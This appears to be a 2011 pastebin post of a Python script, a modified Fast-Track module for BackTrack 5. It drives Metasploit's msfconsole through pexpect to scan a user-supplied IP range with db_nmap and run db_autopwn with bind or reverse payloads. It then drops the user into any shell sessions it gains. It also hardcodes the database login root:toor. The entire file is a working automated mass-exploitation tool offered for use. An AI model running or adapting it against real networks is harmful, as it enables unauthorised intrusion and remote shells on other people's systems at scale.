FastTrack Autopwn BT5

By: a guest on Aug 17th, 2011  |  syntax: Python  |  size: 3.26 KB  |  views: 577  |  expires: Never
#!/usr/bin/env python
# This is not the official file from FastTrack; I just made some changes to work with BT5: MaxFX aka Bl4ck5w4n

import pexpect
import sys
import os
import time
import re

definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include

try:
   import psyco
   psyco.full()
except ImportError:
   pass

# Target range: taken from argv[3], otherwise prompt for it
try:
   ipaddr=sys.argv[3]
except IndexError:
   include.print_banner()
   ipaddr=raw_input("""
Metasploit Autopwn Automation:

   http://www.metasploit.com

   This tool specifically piggy backs some commands from the Metasploit
   Framework and does not modify the Metasploit Framework in any way. This
   is simply to automate some tasks from the autopwn feature already developed
   by the Metasploit crew.

   Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.1-254
   or 192.168.1.1/24 or whatever you want and it'll run against those hosts.
   Additionally you can place NMAP commands within the autopwn ip ranges bar,
   for example, if you want to scan even if a host "appears down" just do
   -PN 192.168.1.1-254 or whatever...you can use all NMap syntaxes in the
   Autopwn IP Ranges portion.

   When it has completed exploiting simply type this:

   sessions -l (lists the shells spawned)
   sessions -i <id> (jumps you into the sessions)

   Example 1: -PN 192.168.1.1
   Example 2: 192.168.1.1-254
   Example 3: -P0 -v -A 192.168.1.1
   Example 4: 192.168.1.1/24

        Enter the IP ranges to autopwn or (q)uit FastTrack: """)
if ipaddr == 'quit' or ipaddr == 'q':
   print "\n\nExiting Fast-Track autopwn...\n\n"
   sys.exit()
# Payload type: taken from argv[4], otherwise prompt for it
try:
   option1=sys.argv[4]
except IndexError:
   option1=raw_input("""
   Do you want to do a bind or reverse payload?

   Bind = direct connection to the server
   Reverse = connection originates from server

   1. Bind
   2. Reverse

   Enter number: """)
if option1 == 'quit' or option1 == 'q':
   print "\n\n    Exiting Fast-Track autopwn...\n\n"
   sys.exit()
# Map the menu choice to the corresponding db_autopwn flag
if option1 == '1': option1='-b'
if option1 == '2': option1='-r'
print "    Launching MSFConsole and prepping autopwn..."

# define metasploit path
#meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
#for line in meta_path:
#    line=line.rstrip()
#    match=re.search("METASPLOIT_PATH",line)
#    if match:
#       line=line.replace("METASPLOIT_PATH=","")
#       metapath=line


try:
   # Start the MySQL service, then spawn an instance of msfconsole
   os.system("start mysql")
   child1 = pexpect.spawn('msfconsole')
# select the MySQL database driver
   child1.sendline ('db_driver mysql')
# Destroy database
#   child1.sendline ('db_destroy pentest')
# Connect to the pentest database
   child1.sendline ('db_connect root:toor@127.0.0.1/pentest')
# run actual port scans
   child1.sendline ('''db_nmap %s ''' % (ipaddr))
# run actual exploitation
   child1.sendline ('db_autopwn -p -t -e %s' % (option1))
   child1.sendline ('sleep 5')
   child1.sendline ('jobs -K')
   child1.sendline ('\n\n\n')
   child1.sendline ('sessions -l')
   child1.sendline ('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"')
# hand the msfconsole session over to the user
   child1.interact()
except Exception:
   print "\n    Exiting Fast-Track...\n"